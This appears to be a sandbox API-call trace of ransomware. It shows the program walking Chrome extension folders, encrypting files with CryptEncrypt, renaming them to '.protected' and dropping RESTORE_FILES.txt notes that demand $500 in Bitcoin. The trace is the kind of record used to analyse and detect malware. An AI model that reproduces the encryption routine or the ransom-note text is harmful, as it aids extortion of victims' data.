-1 [0079.826] lstrcmpiW (lpString1="no", lpString2="$Recycle.bin") returned 1 [0079.826] lstrcmpiW (lpString1="no", lpString2="System Volume Information") returned -1 [0079.826] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no") returned 143 [0079.826] lstrcmpW (lpString1="no", lpString2=".") returned 1 [0079.826] lstrcmpW (lpString1="no", lpString2="..") returned 1 [0079.826] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\*") returned 145 [0079.826] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 
0x47bc10 [0079.827] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.827] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.827] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.827] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.827] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.827] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\.") returned 145 [0079.827] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.828] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.828] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.828] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.828] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.828] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.828] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.828] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\..") returned 146 [0079.828] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.828] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.828] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.828] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.828] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.828] lstrcmpiW (lpString1="messages.json", lpString2="Program 
Files (x86)") returned -1 [0079.828] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.828] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.828] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json") returned 157 [0079.828] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.828] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.828] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.828] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.828] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.828] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json") returned 157 [0079.829] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.829] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json") returned 157 [0079.829] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.829] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json") returned 157 [0079.829] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.829] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x9f, lpOverlapped=0x0) returned 1 [0079.829] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff61, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.829] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x9f, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x9f, lpOverlapped=0x0) returned 1 [0079.830] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.830] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.830] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.830] CloseHandle (hObject=0x168) returned 1 [0079.830] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json.protected") returned 167 [0079.830] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json.protected")) returned 1 [0079.830] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.830] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.830] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\RESTORE_FILES.txt") returned 161 [0079.831] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.831] 
lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.831] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.831] lstrlenA (lpString="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") returned 684 [0079.831] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0079.832] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.832] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.832] CloseHandle (hObject=0x164) returned 1 [0079.832] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.832] lstrcmpiW (lpString1="pl", lpString2="Windows") returned -1 [0079.832] lstrcmpiW (lpString1="pl", lpString2="Program Files") returned -1 [0079.832] lstrcmpiW (lpString1="pl", lpString2="Program Files (x86)") returned -1 [0079.832] lstrcmpiW (lpString1="pl", lpString2="$Recycle.bin") returned 1 [0079.832] lstrcmpiW (lpString1="pl", lpString2="System Volume Information") returned -1 [0079.832] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl") returned 143 [0079.832] lstrcmpW (lpString1="pl", lpString2=".") returned 1 [0079.832] lstrcmpW (lpString1="pl", lpString2="..") returned 1 [0079.832] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\*") returned 145 [0079.832] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 
0x47bc10 [0079.832] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.832] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.832] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.832] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.833] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.833] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\.") returned 145 [0079.833] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.833] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.833] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.833] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.833] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.833] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.833] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.833] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\..") returned 146 [0079.833] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.833] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.833] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.833] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.833] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.833] lstrcmpiW (lpString1="messages.json", lpString2="Program 
Files (x86)") returned -1 [0079.833] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.833] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.833] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json") returned 157 [0079.833] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.833] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.833] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.833] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.833] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.834] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json") returned 157 [0079.834] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.834] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json") returned 157 [0079.834] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.834] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json") returned 157 [0079.834] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.834] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.835] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.835] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.835] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.835] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.835] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.835] CloseHandle (hObject=0x168) returned 1 [0079.835] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json.protected") returned 167 [0079.835] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json.protected")) returned 1 [0079.836] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.836] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.836] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\RESTORE_FILES.txt") returned 161 [0079.836] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.836] 
lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.836] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.837] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.837] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.838] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.838] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.838] CloseHandle (hObject=0x164) returned 1 [0079.838] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.838] lstrcmpiW (lpString1="pt_BR", lpString2="Windows") returned -1 [0079.838] lstrcmpiW (lpString1="pt_BR", lpString2="Program Files") returned 1 [0079.838] lstrcmpiW (lpString1="pt_BR", lpString2="Program Files (x86)") returned 1 [0079.838] lstrcmpiW (lpString1="pt_BR", lpString2="$Recycle.bin") returned 1 [0079.838] lstrcmpiW (lpString1="pt_BR", lpString2="System Volume Information") returned -1 [0079.838] 
wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR") returned 146 [0079.838] lstrcmpW (lpString1="pt_BR", lpString2=".") returned 1 [0079.838] lstrcmpW (lpString1="pt_BR", lpString2="..") returned 1 [0079.838] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\*") returned 148 [0079.838] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.839] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.839] lstrcmpiW (lpString1=".", lpString2="Program Files") 